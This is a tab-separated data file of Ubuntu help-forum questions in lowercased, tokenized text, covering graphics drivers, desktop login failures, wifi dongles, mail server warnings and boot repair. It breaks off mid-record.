498590	neither launcher nor dash appears on login , unity plugin enabled	i was trying to fix an issue with ubuntu 14.04 : my screen would freeze when the computer was woken after being asleep . i followed the instructions here ( ubuntu 14.04 system freezes on wakeup from suspended state ) which lead me to the solution posted here ( ubuntu 14.04 install nvidia driver ) to install an updated nvidia driver . i followed the steps there . this solved my problem , but a new one cropped up : a thick ( 1 inch ) black border appeared around all of my windows , including popups . so , i decided i would get rid of nvidia -- the old problem was less of an issue than the new one . i ran `` sudo nvidia-uninstall '' from the terminal , and then rebooted . upon reboot , i attempted to sign in , but when i did nothing happened : neither the launcher nor the dash appeared . this seemed to describe the trouble i was having : unity does n't load , no launcher , no dash appears . so , i followed the most popular solution here , installing compiz settings manager . i followed the instructions on that page to turn on unity . and then i returned to the terminal and rebooted , as instructed . at this point i still can not sign in . when i return to the compiz settings manager , the unity plugin is listed as turned on . from here , i tried resetting unity by installing the unity tweak tool , and followed the steps here : ubuntu desktop does not load . everything installs fine . when i try to run the unity tweak tool , however , i get a repeating error message of `` dconf-warning ** : failed to commit changes to dconf : can not autolaunch d-bus without x11 $ display '' . i then made sure that i had x11 installed , and followed the instructions here : how to install x11/xorg ? . still the problem persists . any help would be greatly appreciated . i have no idea what to do to fix this , and really need my computer to be working .
498591	how to fixed that failed to connect to projector or tv ?	when i try to press fn+f8 to connect to projector or tv , the ubuntu will force logout . i found that my settings can detect the tv . and i also found that nvidia-settings is weird . it failed to detect my own screen . i use nvidia-prime for graphics driver . i also test that other computer can show on that tv , and my laptop 's windows 8 also can do that . only ubuntu is failed . how to fix it ? thank you~
498596	getting an error connection refused for openxenmanager	i am trying to logon to a server with my ubuntu laptop with openxenmanager and i am getting connection refused . why can i not get openxenmanager up and running ?
498598	14.04 lts on hp elitebook 8740w with nvidia and dreamcolor	i have been running ubuntu 13.04 for quite some time and though i would upgrade to 14.04 lts as i also wanted to migrate to a larger ssd disk . in the past it was tricky to install ubuntu because the hp dreamcolor display in my hp elitebook 8740w needed the nvidia drivers . this was solved using an external monitor to install ubuntu and then install the proprietary nvidia drivers . when trying to install 14.04 lts , this procedure does n't work - all screens ( vga , display-port and built in ) remain black except for some funny coloured characters . i though i could install the old 13.04 and then perform an upgrade . this has also proven to be tricky as `` 13.04 it is no longer supported '' and a lot of references to packages doesnât seem to be valid any more . i get 13.04 installed but have not managed to get the nvidia driver working . ( it works beautifully on my existing installation ( other hdd ) ) . advice appreciated
498599	how much slower will my computer be with ubuntu ( instead of lubuntu ) ?	so i was given an old computer which i 'm going to use as a second desktop next to my main computer for minor tasks like checking my e-mails , listening to music etc . it know has lubuntu , but i 'd prefer to use ubuntu because it 's fully supported and has a more appealing environment . currently , lubuntu uses about 400mb of my ram , but how much more ram will ubuntu use ? do you suggest sticking to lubuntu if i want speed or ubuntu will work , too ? also , if i format the hard disk , will ubuntu automatically find the drivers or i 'm going to have to download them manually ? this is its hardware : intel pentium 4 cpu 2.40ghz ‖ ram 1508 mib ‖ gigabyte 8ig1000mk ‖ nvidia nv44a geforce 6200
498603	upgrading to ubuntu 13.10 from ubuntu 13.04	i have been using ubuntu 13.04 and want to upgrade to 13.10 . last time when i did many of my applications stopped working like evance and i had to format my hard drive . can anybody help me to understand what is more appropriate upgrading or fresh installation of ubuntu 13.10 ?
498604	ca n't upgrade from 13.10 to 14.04	i keep trying to upgrade to 14.04 from 13.10 , but it comes up with the same error no matter what i disable . i spoke to a friend who is quite handy with ubuntu and he said it might be an issue with the wheezy package . i keep removing it from the other software section of settings where the ppa 's are . i then go to upgrade and there is an error message saying ; could not determine the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : upgrading to a pre-release version of ubuntu running the current pre-release version of ubuntu unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . i then go into settings - > software & updates - > other software and wheezy is back in there . i also had the same thing happen when i was using terminal to upgrade via the command : sudo do-release-upgrade
498607	how to load missing firmware to the install media	for a clean install of 14.04 , i get the message `` b43-open/ucode5.fw '' not found . i look in the installation guide section about `` how to load missing firmware '' but could not get an answer -- all the answer seem to assume that you have a terminal . my question is how to prepare install media with the missing firmware . i have downloaded the install and made a dvd which i can learn about ubuntu but the installation hang at the point where it says configuring bcmwla kernel source or some such . can i do it on another machine , i have another with mint 17 , no trouble with that install , it use realtek wlan .
498608	battery drain and over heating on dell xps l502x	i own a dell xps l502x and it works fine if is booted under `` windows 7 '' . no issue ( over-heat or quick-battery-drain ) is observed while using the laptop . after the recent installation of ubuntu 14.04 ( dual boot with windows ) , the laptop gets heated up and battery drains up quickly if it is booted under ubuntu . many websites suggest different work-around but am not sure about the exact one to follow . please provide your suggestions on resolving this issue . intel ( r ) core ( tm ) i5-2450m cpu @ 2.50ghz
498610	vsftpd not listing large directory from wan interface	i have vsftpd running on my ubuntu server , which is behind an asus rt-n66u router . port 21 is forwarded to the server . i can connect via my public ip address to the server , and it lists the files in the home directory . if i then attempt to change directory to one containing many files , it simply hangs with `` 150 here comes the directory listing '' , and after a few seconds gives me an error ( 421 timeout ) and closes the connection . when connecting via the server 's local ip within the lan , the behaviour is normal ( and much more responsive ) , and i have no trouble listing directories with thousands of files . what could the matter be ?
498611	disabling constant rts and dtr on serial to usb adapter	i am using a prolific pl 2303 serial to usb adapter and am using ubuntu 14.04 . the problem i am having is when the usb to serial adapter is connected , rts and dtr are constantly on . this is a problem for me since i am am using rts and dtr to key a west mountain radio rigblaster plus , and this keeps it constantly keyed . how can i disable rts and dtr to be constantly on ?
498613	building nas server and need guidance	i 'm building a nas and using ubuntu as the os . i have a few questions and need some guidance on what direction to take . i know i am asking many questions , if you can only answer one of them please feel free to answer only it . for reference this is the hardware i 'm using . this will be important later on . i currently have this all together running . hp n54l micro server modified bios to allow full speed on sata upgraded to 16gb ecc ram 5 x 4tb seagate nas drives 1 x 120 gb kingston ssd 2 x 32 gb lexar usb 3.0 i am planning on using zfs to create a pool of data and some redundancy . i want to use the ssd as a l2arc.. maybe zil as well , but it might not benefit me . this is not for a business.. this is just a home project for personal use and fun . originally i was going to use the ssd for the cache for zfs , os install , and swap . though i was concerned that a large amount of wear would be on the ssd and i could loose the os if this drive died . i 'm thinking about installing ubuntu to a usb flash drive . i have a fast 3.0 usb flash drive ... the system does have a onboard usb 2.0 port inside the case i was planning on using . i know that i 'm going to be limited by the speed of the bus , though i figured this would be better going with a usb 3.0 stick on a 2.0 bus and being limited by the bus and not the flash memory speed . i figured if the ssd died this would allow the system to stay operating with maybe some reconfiguration . am i right here ? if i place the swap on the ssd to speed things up and have less wear on the usb flash drive . will i still be able to boot if the ssd drive dies and i have no swap partition ? what size should my swap be . i have 16 gb of ram . i read the old way was the same amount of swap for ram . i also read that 8 gb would be good and 0.5 x the amount is a good start . i also read that i might not need swap with that amount of ram . is there anything else i could or should move to the ssd to make the system run better ? though remember that i have concerns the ssd could wear out so this would be something not important for boot or that could be lost if the drive dies . is there anything i should disable when running from usb to increase performance . if i want to mirror my os usb stick to the other extra memory usb memory stick to allow for a backup if the stick dies . how would i do this what would i use . is it possible to have it backup daily the os partition to another usb flash drive . is there a better way of doing this with the hardware i have . basically i want redundancy if my ssd dies and i want to be able to backup the current os daily or so to a usb flash drive . let me know if i need to explain anything out more .
498617	my .bashrc alias not run in .desktop file	i 've added the following line to the .bashrc file : alias midos= '' sh /home/erkanmdr/belgeler/midos/midos.sh '' this command works fine in the terminal and tty . but not working in my .desktop shortcut file . midos.desktop file : [ desktop entry ] name=midos exec=midos icon=/home/erkanmdr/belgeler/midos-128.png terminal=true how do i execute my midos command in the .desktop shortcut file ?
498620	lubuntu libdvdcss2 install-cs.sh not completing	did an install of lubuntu 12.04 a few days ago , and managed to get libdvdcss2 installed - all good , then i mucked up the installation because i 'm a noob , and could no longer install libdvdcss2 . so , decided to get latest 14.04 version and install on my imac ppc g4 system , all good until i try to install libdvdcss2 . this is what i did ... . installed os ( lubunto 14.04 powerpc 32bit ) & updated rebooted installed ubuntu-restricted-extras ran /usr/share/doc/libdvdread4/install-css.sh script which seemed to work , right up till the end , then got the following error : -- 2014-07-16 16:51:09 -- http : //download.videolan.org/pub/debian/stable/libdvdcss_1.2.13.orig.tar.gz resolving download.videolan.org ( download.videolan.org ) ... 88.191.250.9 , 2a01 : e0d:1:3:58bf : fa02:0:2 connecting to download.videolan.org ( download.videolan.org ) |88.191.250.9|:80 ... connected . http request sent , awaiting response ... 404 not found 2014-07-16 16:51:09 error 404 : not found . so , to me it looks like the script is trying to download a specific file libdvdcss_1.2.13.orig.tar.gz , when i browse the source , it does n't exist ! what does this mean ? is it a case that the vlc people have pulled the file , or is the script wrong ? either way , ubuntu & lubuntu noobs like me are not getting dvd playback ! can someone here point me to the correct way for installing the codecs ? many thanks
498624	setting mediatek ( ralink ) mt7601u usb driver	i have mediatek ( ralink ) mt7601u usb , and with their source , but i am user anyone can help how to run this usb wifi ?
498625	how to fix laggy behavior in auctionsieve 2.6.7 in ubuntu 14.04 ?	with auctionsieve 2.6.7 on ubuntu 14.04 , when i move the pointer around with the mouse , the user interface is laggy . a shady gray color is slowly painted across discrete rows of the screen from left to right ( `` row-highlighter '' ) . this behavior makes auctionsieve much slower to use . the developer of auctionsieve responded to me on auctionsieve forums ( 6/21/2014 ) . he said he suspects `` a weird combination of window manager , gpu driver , and java '' , and suggested that i try java 8 . at this time , openjdk 8 is not in the ubuntu repositories , and i do n't want to destabilize my system by installing it by some other means ( e.g . ppa ) . i am not a ubuntu expert , and i am trying to keep things simple , as well as keep my os clean and stable . has anyone encountered this issue , and overcome it ?
498628	ubuntu 12.04 kernel 3.13.0.30	i have a dell inspiron 15 with ati graphics card . everything was working without any problems until kernel 3.8 . during the regular updates ubuntu suggested to update to kernel 3.13.0.30 . after that the operating system is not able to load in normal mode . grub appears and i can login to failsafe mode with all kernels including 3.13.0.30 . i can also login normally when using kernel 3.8 . when using 3.13 normal login will endup to a blank screen before lightdm loads ( before the login screen ) .
498634	importerror : no module named paramiko	i have install paramiko via `` sudo apt-get install python-paramiko '' , but it ca n't be import in python . how to solve this ? python 2.7.6 ( default , mar 22 2014 , 22:59:56 ) [ gcc 4.8.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . import paramiko traceback ( most recent call last ) : file `` '' , line 1 , in importerror : no module named paramiko
498635	how to remove gnome from ubuntu desktop 14.04	i need to use ubuntu desktop on my server for certain reasons because i ca n't use ubuntu server , but to make it more efficient i would like to remove the desktop environment and boot straight to the shell , all the other questions i saw the answer were for older versions of ubuntu and the commands they posted did not work , mostly because it said those packages were not found . all in all i just need the desktop environment gone and boot to the shell . thanks in advance , josh .
498636	ubuntu 12.04 - problem with nvidia drivers	i installed 12.04 lts recently . i installed nvidia drivers running the following in the terminal : $ sudo apt-get purge nvidia-* $ sudo apt-get update $ sudo apt-get install nvidia-current-updates i also tried installing via the run file : link . after executing the run file and rebooting , my screen resolution is stuck at 640 x 480 . i have a fhd screen . i have run sudo apt-get purge nvidia-* again , and now want to ask how can i ask fix this problem . right now i have nothing relevant to nvidia on my system . running sudo dpkg -- get-selections | grep nvidia gives me an empty result . my screen resolution is still 640 x 480 . ( there are so many answers out there on this topic and commands in various order , that i had to ask it again , sorry if its exactly a duplicate ) edit i tried uninstalling using the run file , and it asked me if i want to bring back the backedup x settings . i clicked yes . after uninstall & reboot , the desktop just had a wallpaper . then i ran : sudo apt-get install nvidia-current-updates i rebooted again . right now desktop looks normal . if i run sudo dpkg -- get-selections | grep nvidia i get nvidia-304-updates install nvidia-current-updates install nvidia-settings install my system settings still shows graphics : unknown . how do i tell if my display drivers are configured correctly ? i can also run : $ nvidia-settings and a window titled nvidia x server settings pops up . does this mean everything is ok , despite settings telling me unknown graphics ? edit 2 i tried installing mesa-utils , now instead of showing unknown graphics , it shows it as blank : p .. is that better ? edit 3 i think my nvidia driver is still no configured properly . referring this answer when i run : glxinfo | grep vendor i get xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . expected output : server glx vendor string : nvidia corporation client glx vendor string : nvidia corporation opengl vendor string : nvidia corporation what to do ? edit 4 i also tried $ lshw -c video warning : you should run this program as super-user . *-display unclaimed description : vga compatible controller product : gk208m [ geforce gt 730m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list configuration : latency=0 resources : memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000- d1ffffff ioport:3000 ( size=128 ) *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:49 memory : f1000000-f13fffff memory : e0000000 -efffffff ioport:4000 ( size=64 ) warning : output may be incomplete or inaccurate , you should run this program as super-user . does this indicate everything is in order ? edit 5 here 's my additional driver window : should i go ahead & enable 304 ? edit 6 after running sudo apt-get install nvidia-current as per one of the suggestions , the additional driver windows changed to : also : $ sudo dpkg -- get-selections | grep nvidia nvidia-304 install nvidia-304-updates install nvidia-current install nvidia-current-updates install nvidia-settings install graphics settings is still blank . running $ nvidia-settings shows me : what is left to do ? ? edit 7 with no one replying ... i am installing the last entry in the list , and deactivating 304 . now i will try sudo nvidia-xconfig & a reboot . fingers crossed ..
498641	libmysqlclient error . no file ( even though its there )	trying to launch a program . i get the error as follows : ./theforgottenserver : error while loading shared libraries : libmysqlclient.so.16 : can not open shared object file : no such file or directory i have libmysqlclient.so.15 in the /usr/lib64 directory . so the file is there , i even put it in the programs directory that i am trying to launch .
498643	installing super hot	i downloaded the linux build of super hot , i 'm kinda new to ubuntu , so i have no idea what to do with the files i 've just downloaded ... it 's a zip file , i extracted it to my desktop , and there were a file with a long name and a x86 extension , i renamed it to superhot.x86 if i would need to use a terminal ... i opened up the file and it started extracting .part2 files to the folder ... i have no idea what to do next ... . link for page : http : //superhotgame.com/play-prototype direct download : http : //superhotgame.com/superhot_prototype_linux.zip
498645	ca n't run sudo from terminal	i 'm having an issue where i ca n't even run sudo from the command line , like for example i need to see or edit a file that required the use of sudo with nano or some other sudo nano /path/to/file but when i run it , instead of being greeted with password : like it usually does , it just hangs and does nothing , and no amount of waiting does anything . how do i fix sudo from doing this ? i can still log in with root if i do ; su - but this is not a very safe way of doing things since that puts me at root level instead of sudo .
498650	nvidia gtx 760 drivers ?	running the nouveau driver i can use my max resolution of 1280x1050 however trying to setup 3d cube i get a weird tearing like effect as if i ran out of a source-game map trying to switch to the recommended nvidia drivers i then am unable to use my max resolution ... what do i do ?
498652	system-indicator setup	i use the `` indicator-multiload '' -panel to show up network up- & download . actually i get the information shown graphically , but i want to see it by values ( kb/s or mb/s ) . how can i get this functionality ? best wishes and thanks in advance martin
498654	center drawn text on point with imagemagick	i am writing a script to generate text on an image . is there a way to have the text centered on the location i move it to ? right now it is left justified from the point . convert dayback.png -font helvetica-boldoblique -pointsize 250\ -draw `` fill black text 1450,200 ' $ day1ex ' `` \ day.png
498659	ubuntu-tweak user folder assignments are not persistent	i have always used ubuntu tweak to set my default user folders ( download , pictures , documents etc . ) since i upgraded to ubuntu 14.04 , the changes that i make to my user folders are not persistent , i.e. , i have to reassign them using ubuntu tweak on every boot . if it 's helpful , two of the folders ( music & video , if it matters ) , which are assigned to an external usb hard drve , do actually persist . the rest are on the internal hd and do not . if anybody has experienced this issue or has any guidance i 'd be grateful . i have hunted for answers to this question and found very little useful information .
498663	ubuntu12.04 has 3 desktops after software update	my ubuntu 12.04 has n't been used since this time last year so i updated the software via `` update manager '' . but after the update , ubuntu gets 3 identical desktops after login . whatever operation happens in 1 desktop , the other 2 desktops get the identical operation . it makes the system very slow . i really want only 1 desktop but ca n't figure out how . all the searches found online is about workspaces . here is the link to a screenshot of the 3 desktops
498664	ubuntu 14.04 wo n't boot	i have been trying to install ubuntu for some time but it wo n't boot at all . i followed the instructions on the ubuntu website to make a bootable usb drive ( i used pen-drive-linux ) . then i changed the boot order ( the bios sees the usb ) but it fails to boot from it . i even tried unplugging my hard drive and it still does n't see it . i have an asrock 960gc-gs motherboard . windows can see the files just fine but it wont boot . thanks for any help .
498666	installing windows 7 after ubuntu	first i would like to note i do n't have a lot of experience with linux systems nor a lot about dual booting . i have ubuntu studio 14 installed and i tried to install windows afterwards . i have ubuntu installed on a ssd and i have a 2.0 tb hd that i want to install windows on . i formatted the hd and tried to install windows , but i get the following error : setup was unable to create a new system partition ... i tried every way mentioned by this site and on other forums and blogs , but nothing worked the error is still present . i 'm not sure what to do ... but i would rather not uninstall ubuntu for windows .
498668	weird arabic notification on login	i do n't speak arabic and neither have i installed anything related to arabic , but on login i get this strange notification : what could be the cause and how do i get rid of it ? ( also , what does it say ? ) thanks
498671	kde . set plasma 5.0 lockscreen	i want to set plasma 5.0 lockscreen . http : //www.kde.org/announcements/plasma5.0/screenshots/lockscreen.png when i execute $ sudo dpkg-reconfigure kdm i see list with gdm , kdm , lightdm . there is not lock screen of plasma 5.0 although it installed and i can launch it from kdm .
498674	postfix warning messages : override earlier entry	i have configured postfix with satellite configuration . i found the following warnings in my syslog . any idea what it means ? and how could i resolve this problem ? jul 16 13:39:24 mou-lanister postmulti [ 2042 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2046 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2053 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2057 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2061 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2063 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2065 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:24 mou-lanister postmulti [ 2069 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:25 mou-lanister postmulti [ 2095 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:25 mou-lanister postfix [ 2096 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:26 mou-lanister postfix/master [ 2101 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:27 mou-lanister postfix/master [ 2131 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:27 mou-lanister postfix/master [ 2131 ] : daemon started -- version 2.11.0 , configuration /etc/postfix jul 16 13:39:27 mou-lanister postfix/qmgr [ 2137 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com jul 16 13:39:27 mou-lanister postfix/pickup [ 2136 ] : warning : /etc/postfix/main.cf , line 43 : overriding earlier entry : relayhost=smtp.gmail.com and what does the following e-mail mean ? is it some kind of configuration error ? mail delivery subsystem jul 15 ( 1 day ago ) to me delivery to the following recipient failed permanently : root @ lanister.net technical details of permanent failure : the recipient server did not accept our requests to connect . learn more at http : //support.google.com/mail/bin/answer.py ? answer=7720 [ ( 0 ) lanister.net . [ 2a00:15f8 : a000:5:1:12:5 : e733 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 2a00:15f8 : a000:5:1:14:5 : e733 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 2a00:15f8 : a000:5:1:11:5 : e733 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 2a00:15f8 : a000:5:1:13:5 : e733 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 90.156.201.116 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 90.156.201.80 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 90.156.201.52 ] :25 : connection refused ] [ ( 0 ) lanister.net . [ 90.156.201.94 ] :25 : connection refused ] -- -- - original message -- -- - dkim-signature : v=1 ; a=rsa-sha256 ; c=relaxed/relaxed ; d=gmail.com ; s=20120113 ; h=from : to : auto-submitted : subject : message-id : date ; bh=jptdrvzcggykh/fpsbxmrzddqjd8vplcmvdnka7thva= ; b=xptgoc+0tv6ima667idg4up4awcjfdsdzbcazx5ncbr4fukssycpaxfiamab1llc7m eqdiuwjcfobuarxlqi7ndhxbp2r9jnlbzz2+e15fwh57ldpw6uww1dqkt8z/rrcdguq6 blqwbpyp26klkqqrircew//0di8auauy0fs4dlyx91xyyuabsbzfmflw1cbdk0tgbrsj 0o/ng1ddwuaipurxknlyag/wu1osy7mxa6hdbn2euwqf5i0k4ww6jcgw/5it/hnzrwpi dk5b4docpettro+66dvtww1us/4kbomm7jundrpbm3a78zbu9gsnwugmzc6mr0iftswz jfwa== x-received : by 10.50.77.48 with smtp id p16mr11423986igw.41.1405165154249 ; sat , 12 jul 2014 04:39:14 -0700 ( pdt ) return-path : < myusername @ gmail.com > received : from mou-lanister ( mydomainname.net [ my-external-ip ] ) by mx.google.com with esmtpsa id vk3sm4844593igb.17.2014.07.12.04.39.11 for < root @ lanister.net > ( version=tlsv1.2 cipher=ecdhe-rsa-aes128-gcm-sha256 bits=128/128 ) ; sat , 12 jul 2014 04:39:12 -0700 ( pdt ) from : myusernamename @ gmail.com x-google-original-from : mou @ lanister.net received : by mou-lanister ( postfix , from userid 1000 ) id b505c1480086 ; sat , 12 jul 2014 07:39:08 -0400 ( edt ) to : root @ lanister.net auto-submitted : auto-generated subject : *** security information for mou-lanister *** message-id : < 20140712113908.b505c1480086 @ mou-lanister > date : sat , 12 jul 2014 07:39:08 -0400 ( edt ) mou-lanister : jul 12 07:39:08 : mou : 1 incorrect password attempt ; tty=pts/5 ; pwd=/home/mou ; user=root ; command=/usr/bin/apt-get install ircii
498680	ralink 148f:760b mt7601 driver not working	i got new ralink mini wifi dongle . lsusb returns : bus 002 device 003 : id 148f:760b ralink technology , corp. it 's based on mt7601um chip . driver installed following : this instructions does not work . any suggestions apart from buying older dongle ? i 've tried it on 10.04 ( linuxcnc ) and 14.04 x64 some diags : dmesg | grep -e mt7 mt7601usta : module verification failed : signature and/or required key missing - tainting kernel modprobe returns nothing lsmod | grep mt76 mt7601usta 807204 0
498681	ubuntu 12.04 can not update kernels	currently i can not load the kernel 3.8.0-39-generic , or 3.8.0-38-generic . i have to go back and use 37 , is there anywhere i can remove the two newer ones and re install them ?
498687	is there a problem to upgrade a system if you get `` system restart required '' upon logging in ?	i know there 's a lot of questions similar to this one but i need clarifications ( and since i do n't have 50 reputation to comment , let 's ask another question ! ) i have this system someone upgraded not long ago , new kernel got installed but the system was n't rebooted at the time , and it 's a `` production '' server so i can not reboot it anytime i want . now i 'm planning for maintenance , since then the system has 38 more updates to be done ... that 's why i 'm asking , could there be a problem if i upgrade the system again without rebooting first ? thank you .
498689	how to force ipv4 on ubuntu desktop 14.04	i 've stripped the desktop from my installation as per my last question , but it is not assigning my server an ipv4 address , there is nothing wrong with my configuration , i just need it to give my server a ipv4 address alongside the ipv6 address so that i can access it from within my network for things like portforwarding . my router does not support port forwarding with an ipv6 address and my other computers within the network ca n't connect to my server because it lacks an ipv4 address . so in a nutshell i need to make my server assign itself an ipv4 address . my server will not show up in the connected devices of my router until i give it an ipv4 address , which creates a problem . setting a static ip in /etc/network/interfaces does n't work , it only makes my server think that it has an ipv4 , but the network does n't recognize it .
498691	why are n't these empathy bugs fixed ? style broken . first message blank	i 'm sure this is filed in plenty of bug reports . does anyone know why on a fresh install of ubuntu 14.04 64 and 32bits ( and probably several prior releases ) this bug in empathy still exists ? the first chat message comes in styled like the mess in the screenshot here http : //postimg.org/image/jv3ikm3nh/ . getting it right means you need to go into setting , unset the ubuntu theme and reset it . this is such a trashy thing to let linger . newcomers are instantly turned off . plus , the first message received from a sender is not in the new window loaded by empathy . you have to close the message window and open it up again . really ? ? why even have software this crumby loaded ? it lowers overall the quality considerably .
498693	black screen on resume after suspend , pm_test is fine	i 'm using ubuntu 14.04 on a lenovo ideapad s205 . when i resume from suspend-to-ram , fan goes on but screen stays off . the computer does not respond to anything except a hard shutdown ( press and hold the power button ) . i have done some debugging , but i do n't know what conclusion to draw . any ideas based on the results below ? some debug sources i found : debugging hibernation and suspend how to debug suspend-resume issues tests and results all commands are entered as root ( sudo -i ) . dmesg_after procedure # echo mem > /sys/power/state ; dmesg > dmesg_after result like usual , black on resume . importantly , no dmesg_after file is created . pm_test procedure # echo freezer > /sys/power/pm_test # echo mem > /sys/power/state repeat above and subsitute freezer with devices , platform , processors and core . result resumes fine . without x procedure at boot , press esc to enter grub menu edit first entry , edit kernel ... line , append rw init=/bin/bash , and boot in the shell , repeat pm_test procedures result same as with x . with freezer , devices , platform , processors or core in /sys/power/pm_test , resume works fine . otherwise , resume gives black screen of death . no dmesg_after file is created . latest kernel procedure install latest kernel according to the kernel/mainlinebuilds ubuntu wiki page ( 3.16.0-031600rc5 ) reboot with new kernel , with or without x repeat the `` dmesg_after '' test result same as with current stable kernel ( 3.13.0-32-generic ) .
498699	is there a way to use an ntfs drive that contains my games and is also external to my installation of steam installed viawinetricks ?	i am new to using this site , but not really that new to ubuntu . i decided to do my best to get the things i love to work on linux . i do understand that there are some pretty good games on steam that work natively for linux , unfortunately they are n't my desired games . first my setup . i have ubuntu 14.04 lts , i have 6 hard drives . each are separate based on the type of files ( games , application , movies , videos , and ubuntu , and windows ) the ubuntu drive is only a 40gb hd , and the only ext4 partition . targeted game dcuo ( dc universe online ) i know the game actually worked on 12.04 , but my problem exist before that . so i mentioned already that my ubuntu drive is really low on drive space . i am aware i can just buy a new hard drive . but i would like to avoid that for now and get an understanding to my problem . i wanted to know if it is possible to use an ntfs drive that was normally dedicated for games as a steamapps folder for wine steam . i do not mind reinstalling/deleting/etc the current steamapps that has my windows games.i have a pretty nice upload/download speeds . i just wanted to know of a way to setup steam on wine to also use that ntfs steamapps folder . or making a new steam apps folder somewhere on one of my drives that has a much bigger capacity because i play a lot of mmo 's .
498702	hdmi connection between tv and a laptop with ubuntu ( 14.04 ) + nvidia optimus possible ?	question briefly : is it possible to connect a ubuntu laptop with nvidia optimus to a tv via hdmi connection ? the connection should also have sounds included , because otherwise it would be easier just to go with a vga cable . background information : i have been trying to connect my asus u31jg with nvidia optimus geforce gt 415m cuda gpu to my samsung tv via a hdmi cable . this causes the laptop screen to `` crash '' ( it divides to two 'halfs ' , and stops responding ) . however , ctrl+alt+f1 still opens new terminal window succesfully , so it looks like that only the screen crashes , not the whole pc . i have nvidia-common , xserver-xorg-video-nouveau , libgl1-mesa-glx , libgl1-mesa-dri and xserver-xorg-core installed ( a 'fresh ' installation of them all ) . and my lspci -nn | grep vga output is 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 415m ] [ 10de:0dee ] ( rev a1 )
498703	is it possible to `` lock '' firefox in one state and run it from that state ?	is this possible ? for example to do something like `` hibernate '' for firefox , that is to run it wit all plugins in a certain state .
498704	problems when trying to install boot-repair	i 'm tryng to install boot-repair because of some reasons but it does n't work . i tried to run the following commands : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) but when i tried to run it i got the following output : [ note the asterisks ] yagel @ yagel-pc : ~ $ sudo add-apt-repository ppa : yannubuntu/boot-repair *** simple tool to repair frequent boot problems . website : https : //launchpad.net/boot-repair more info : https : //launchpad.net/~yannubuntu/+archive/ubuntu/boot-repair press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmp_g6qzt9c/secring.gpg ' created gpg : keyring `/tmp/tmp_g6qzt9c/pubring.gpg ' created gpg : requesting key 60d8da0b from hkp server keyserver.ubuntu.com gpg : /tmp/tmp_g6qzt9c/trustdb.gpg : trustdb created gpg : key 60d8da0b : public key `` launchpad ppa for yannubuntu '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok yagel @ yagel-pc : ~ $ sudo apt-get update *** ign http : //il.archive.ubuntu.com trusty inrelease ign http : //il.archive.ubuntu.com trusty-updates inrelease ign http : //il.archive.ubuntu.com trusty-backports inrelease hit http : //il.archive.ubuntu.com trusty release.gpg //output trimed ign http : //il.archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //il.archive.ubuntu.com trusty-backports/universe translation-en_us err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found hit http : //security.ubuntu.com trusty-security/multiverse translation-en //output trimed ign http : 